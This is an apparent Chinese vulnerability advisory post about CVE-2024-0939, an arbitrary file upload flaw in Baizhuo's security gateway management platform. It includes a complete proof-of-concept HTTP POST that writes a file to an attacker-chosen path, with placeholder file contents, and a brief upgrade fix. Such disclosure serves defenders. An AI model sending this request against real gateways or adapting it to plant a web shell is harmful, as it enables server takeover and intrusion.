探索网络安全新技术
攀登黑客技术最高峰

CVE-2024-0939:百卓安全网关管理平台任意文件上传漏洞

漏洞概述

百卓网络智能业务安全网关智能管理平台存在任意文件上传漏洞,攻击者可以利用此漏洞执行任意命令能够利用该漏洞获取服务器权限,导致服务器沦陷。

影响版本

Smart管理平台

漏洞POC

POST /Tool/uploadfile.php? HTTP/1.1
Host: 127.0.0.1:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 380
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

12122323222
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/111.php
-----------------------------13979701222747646634037182887--

CVE-2024-0939:百卓安全网关管理平台任意文件上传漏洞-威武网安

修复方案

升级最新版本。

赞(1) 打赏
版权声明:本文采用知识共享 署名4.0国际许可协议 [BY-NC-SA] 进行授权
文章名称:《CVE-2024-0939:百卓安全网关管理平台任意文件上传漏洞》
文章链接:https://www.wevul.com/6529.html
本站所有内容均来自互联网,只限个人技术研究,禁止商业用途,请下载后24小时内删除。

评论 抢沙发

如果文章对你有帮助 可以打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫打赏

微信扫一扫打赏

登录

找回密码

注册